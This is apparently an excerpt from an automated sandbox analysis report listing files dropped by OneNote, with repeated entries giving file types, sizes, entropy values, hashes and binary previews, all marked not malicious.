                                                                                                                                                                                                              Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):32656
                                                                                                                                                                                                              Entropy (8bit):3.9517299510231485
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                                                                                                                              MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                                                                                                                              SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                                                                                                                              SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                                                                                                                              SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12824
                                                                                                                                                                                                              Entropy (8bit):7.974776104184905
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                                                                                                                              MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                                                                                                                              SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                                                                                                                              SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                                                                                                                              SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):32656
                                                                                                                                                                                                              Entropy (8bit):3.9517299510231485
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                                                                                                                              MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                                                                                                                              SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                                                                                                                              SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                                                                                                                              SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12824
                                                                                                                                                                                                              Entropy (8bit):7.974776104184905
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                                                                                                                              MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                                                                                                                              SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                                                                                                                              SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                                                                                                                              SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.327674242198577
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:Yu2RspKdPnTvtlvE/rEya7tXsX49rJjdRrd3r7NxB9RXj43gtF/q3sHcI:YzRsePnTvrvKrEyaJX849rJjRbF95
                                                                                                                                                                                                              MD5:0BCD7C3EB29FBC7C582007E9E333AC70
                                                                                                                                                                                                              SHA1:509BE1B4F1A4977AFD59157900C891AE23F4F4FB
                                                                                                                                                                                                              SHA-256:D909F644CE501A96D95C879A55D0EDD5CAB3F3E87F2FEF14EA8750892C9C0C38
                                                                                                                                                                                                              SHA-512:38A22FD26B968AB84CD4FDCD8F96EC04BF02377A8BA318575673B0DA1E99BF5B73719E18EF988BFEFE91063D4B9F82F340B4CA345AC130B549E4496F0EFA9307
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ).......)...(z........)...(z........)....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................S....4....5.....N...^.................%zf.,I.$1.G..........f........................................I.qk..B.....LZ...............S....4....5............S....4....5..........).......).......)...........................................)..j....)..T.]..).......)....B..)..H....)....B..)....>.))....J...................;........4...4...4.."..............)...)...)....z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4.........).......)......#)..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):39010
                                                                                                                                                                                                              Entropy (8bit):7.362726513389497
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                                                                                                                              MD5:9700DE02720CDB5A45EDE51F1A4647EC
                                                                                                                                                                                                              SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                                                                                                                              SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                                                                                                                              SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.426535164318094
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:zWCsnUwgUdWT4dt0lS9tEzuEr+lXpXWkk5p9uzuDj4Brd3rgxShdX2U22WD9:Zs+UUT4dtcS9WKEiZX9G9IKcRbHhjG
                                                                                                                                                                                                              MD5:C3BBEE85760E1D6675AB1E759BBB8DE9
                                                                                                                                                                                                              SHA1:0516656D38A0725E1913B216D0ADCE7FE9D366BC
                                                                                                                                                                                                              SHA-256:BE92862F04DCBADFE15022682D29A82C386B3A122E67827706451B7636CA0000
                                                                                                                                                                                                              SHA-512:EB503A5430E268EB6798E176041B75769E0BE9B7A6979EA1D69ECE0D59EAA78DCDC3861F5CCB1819D5976165BAC32BD8C4BD54FD42AA9B97786BD2DD2B90D277
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......h...v...\...................................................................................................................................2...>...D.......v................................I.......I.qk..B.....LZ.m.......m.]]I......x\<..m.]]I......x\<..m...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............e..t...+.v.........N...^................k..<..B....6>..........f........................................I.qk..B.....LZ.............e..t...+.v..............e..t...+.v...............m.......m.......m...........................................m.j.....m.T.]...m.......m...B...m.H.....m...B...m...>.).m...J...................;........4...4...4.."...............m...m...m...z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4..........m.......m.....#.m.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25622
                                                                                                                                                                                                              Entropy (8bit):7.058784902089801
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                                                                                                                              MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                                                                                                                              SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                                                                                                                              SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
                                                                                                                                                                                                              SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.332292459554775
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Y1jnsi/VMQz7T4FMEmNXU98psRbHcV8cgi4:WsAz7TqpmNXU98psRbH
                                                                                                                                                                                                              MD5:65D91B24EFC855A3B12A4ED6975FFD14
                                                                                                                                                                                                              SHA1:9AEA555EE479BE8921AB9936F2C0853AAD4D6BE5
                                                                                                                                                                                                              SHA-256:8FA98B361EF8B91A4166C2440746901298DCE431BD390F64AC6C9AE65E76B728
                                                                                                                                                                                                              SHA-512:1071E80511A919B2303FE97577DB8BC9EFA88B179A6B7CCA04E1D19BAF7FDD621754798D6C30BD9B33C08A804621FF5BAAFBB97A3A022D36A62741EB774E44A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.._......._.Ylq..,...e..._.Ylq..,...e..._..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............jY7`.....`.(..d....N...^...............mZ}B...E...............f........................................I.qk..B.....LZ.............jY7`.....`.(..d.........jY7`.....`.(..d..........._......._......._..........................................._j......_T.]...._......._..B...._H......_..B...._..>.).._..J...................;........4...4...4.."................_..._..._..z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4..........._......._....#.._............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 50 x 500, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2033
                                                                                                                                                                                                              Entropy (8bit):6.8741208714657
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:P37XYSDTz+UUl7DHt7Ah8l1+4ZfFclFUXwobKXlZr:v7j3z+UoDN0h8ugf2AwobMN
                                                                                                                                                                                                              MD5:CA7D2BECCBC3741D73453DCF21D846E0
                                                                                                                                                                                                              SHA1:E34B7788498E33FFF0CFB00125E6BA9E090F6CED
                                                                                                                                                                                                              SHA-256:E9EAD0BFC09D32CB366010CDFEDE1C432A2D1D550CB7332BADAC1BEE9482BC86
                                                                                                                                                                                                              SHA-512:7FE2C3654262B1EEBED4F6D83DA7D3450E1BE52500A3964185FC0092041506A237A2728E5D7EEA0A3814E413E822B803B789C49CF744D51816A2E4EDE5B4247B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...2.........H'......PLTE........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.\.W.G...=a.ewA..a.!r( ...%Dc..x.x....N.OO...3=...S...........~.z.D.0...g.2P.7.*M.#'....z.......3TPj.Z.[5....V..z'L3...a.j9..C>..9.z
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.547286021255523
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:KU3fsV3g+btTD6wwEkJLseXVee9Iwj41rd3rcxixdXgXmI931:KQfsVQ+bxOE84eXUe9IwYRbdxK
                                                                                                                                                                                                              MD5:5CC41637D343B107A6608FB01326AB48
                                                                                                                                                                                                              SHA1:ED1A84C7CDB0D303036DA5D842F5290873434C25
                                                                                                                                                                                                              SHA-256:53CABB8263E7CAB95B828200D09AA48948D25B0E0D3F680D31B90636AAAAC141
                                                                                                                                                                                                              SHA-512:F156F9C4CA9062C0EE57D091B7A520F852EEE1515C996482FD3E39BF2020B99EFD97AD36B00AE0BCD19DD198F7CFFAD5111ADCB06F67F060E8E3250ABD497BC8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:6...B...,.......R.......................................................................................................................................6...B...f.......R................................I.qk..B.....LZ..............,uH.:..!.)...-..........,uH.:..!.)...-....6...B.......~...R.............................I.......I...................................................I.t.....I................................................................4..'...'.......................................................................~..............................................................................................I.qk..B.....LZ....*.........|.......|.......|...........................................|.j.....|.T.]...|.......|..B...|.H.....|...B...|...>.).|...J...................;........4...4...4.."...............|...|...|...z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4..........|.......|.....#.|.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:OpenPGP Public Key
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):2.6010958865432343
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:pB7s98SydNDpggUlHWi3duVUlX1Uku4PWUl+9JgBOUliMpNAB26O5Ul3SD8:p+SBdNGl24llUYDl+3Ilx/As7KlCD8
                                                                                                                                                                                                              MD5:58DB671716AA66B135C9ECAE75D2BF40
                                                                                                                                                                                                              SHA1:62D07CC2E1C650F876586392536F30EA47C54943
                                                                                                                                                                                                              SHA-256:612C3B0D953A21BEBE39486A1F8A0C3616CD1A5DEA946F19B5D726EDFC0FB9D7
                                                                                                                                                                                                              SHA-512:C1705391A4138EE1561176676AD62DD67F1094E3493401CEE934BD2F25DC24076E5B116DB9D7A530D5CA56B0EEA6C1120C1C1AB52A6CF7A7D848F2FCDB71988C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......................................?...~.............................................................................................................................................................vm......vm..B`...4.a..jQ..............|F.{..%V./..........m..;.$....vm..B`...4.a..jQvm..E.bZo.U.7...h...E.b...........................................................................m.....`........7......Q......]......e......q....................4..~...1...(...(.......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.T.e.m.p.l.a.t.e.s.\.1.0.3.3.\.O.N.E.N.O.T.E.\.1.6.\.S.t.a.t.i.o.n.e.r.y.......S.t.a.t.i.o.n.e.r.y.............1.......S.t.a.t.i.o.n.e.r.y................1... ..$....S.t.a.t.i.o.n.e.r.y.......Oj3.....Oj3'1?T....o................L...?..K.2......."...R.......................Oj3.E.b.............................E.b..c..,.......................E.b..c..,0...........}..t.SuM.;T...%V......................1... ..$....S.t.a.t.i.o.n.e.r.y...........
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):1.045379024174986
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:/zyfhTOzhSxWJ/wMJKl/ilCgJiltV5xil6UgcQTllzcQED:/kTiSAJ/zogwV56ga
                                                                                                                                                                                                              MD5:3EE9CB433572B223A2D3F76DBD141FE9
                                                                                                                                                                                                              SHA1:6E2A53C87A300B9FF9182B39B2FB8E5B8A5C0169
                                                                                                                                                                                                              SHA-256:7862C0F02C9D12068E10AB42172EA89EDF6BC6D427AA586E8D0E1F820DA56EF3
                                                                                                                                                                                                              SHA-512:8034A6021C72905460EEAB6CE9D3821F1902D3E63464BC9AC13064988C96DB9479AC55634DFD9AF20EEB3DDB9364599578F695755127E40E58887A891CDE6337
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....>...................................................................................................................................................................................................48......48.;.".E......G.Y.......Y......C....X~W.Y......C....X~W.Y...qh7.7..C.....r.Bqh7.48.;.".E......G.48...........qh7.....qh7.................................................qh7..(..qh7`....Y..N.2....................................................4..~...1...(...(...h...C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.T.e.m.p.l.a.t.e.s.......T.e.m.p.l.a.t.e.s...............1.......T.e.m.p.l.a.t.e.s..............Y....1... ..$....T.e.m.p.l.a.t.e.s.........qh7.....qh7.7..C.....r.BY.......Y......C....X~W.2...............................48.......................................48...c..,..............n......B...,.g......N...^...........................................................................................................n......B...,.g..............
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.7459003925177762
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:DaC+Ata/IAYMnivD0XDwVhEiDwVhKrBWDwVhoAYQEjaAk:OSta/Isni7rVh6VgBpVAH
                                                                                                                                                                                                              MD5:FD1FF2A8BE7E485AFD94886EA0708AEF
                                                                                                                                                                                                              SHA1:91C4D56407846C39469CF95F35C136FEBE79E9D6
                                                                                                                                                                                                              SHA-256:250F30B77626A2CA9543DE18DDF0654C763139A509411F68CC05015DE89151BA
                                                                                                                                                                                                              SHA-512:89E75251359A2AB761A034537ED3932E8E81B9AE10D58B7007A887C95E5E82422C9F5F7D124DC30CA23746EB2F076E6365D5B4CF1BF34B0228D0D1E4A23EB631
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>..........................?..........................................................................................................................................................................G.......G.~.uE.n.#.W..].......].4.J.I..../..s..G.~.uE.n.#.W....G..].4.J.I..../..s.].................................G.......G...................................................G..#....G\......GN.!....................................................4..1...(...(.......L.i.v.e.C.o.n.t.e.n.t...........1.......L.i.v.e.C.o.n.t.e.n.t...............]...c..,.....................G..1... ..$....L.i.v.e.C.o.n.t.e.n.t.............e.k.1.B...Q........N...^...........................................................................................................e.k.1.B...Q........................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.9145891837749062
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:9/RssLhanFvkLVa3hFL16VbjqcptdwnjTjls6x8MHAjoChdVf1tlc3loHWA+axlX:zPLcoV8V6VqqGDAdVNXc1n2cQEj0
                                                                                                                                                                                                              MD5:FB0673D9FB7D404A46B0949B7C3E3C8E
                                                                                                                                                                                                              SHA1:35AA8185B0C6FA53283064C7FB7D23564222FA3E
                                                                                                                                                                                                              SHA-256:6B55DC7FFF73C13B839A79DCD9E576B698C83665CC6A0C1EC652BEC0AF9769B5
                                                                                                                                                                                                              SHA-512:9A540F41F551F3DDF182AEDBA8E8DE183A05F5BB8761966C35D8339CB644AD53F55A48EBA5442FEC3A73D1D074AB2B096FF5D737B862469F49E510205E1CB880
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....>...................................................................................................................................................................................................ww`.....ww`..oYD.\.....K............sHO.8.D...ww`..oYD.\.....Kww`......J.._.nzT........sHO.8.D..M.............ww`.....ww`.................................................ww`..+..ww`\....ww`N....ww`N.)...............................................c..,.........................4..1...(...(.......1.6............ww`..1... ..$....1.6...................J.._.nzT.............sHO.8.D..M2...............................ww`..........................................c..,...................ww`.ww`..1... ..$....1.6............}].h.|N.c:.P.......N...^............................................................................................................}].h.|N.c:.P...............................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:OpenPGP Public Key
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):1.6105573137106526
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:8LhxhIZngWlE8xeLWVglWLVPxhluLTlB:ucdgyE8UchAB
                                                                                                                                                                                                              MD5:8134D3844A0799E37AC4BA1EBDC8B1C7
                                                                                                                                                                                                              SHA1:D50C4B36363DF608CF7F9F10F152F5D39E6CD65E
                                                                                                                                                                                                              SHA-256:481B8C4C25039616863755AE43C4838EDD9C6278BE4A48709913373C8EB7E56F
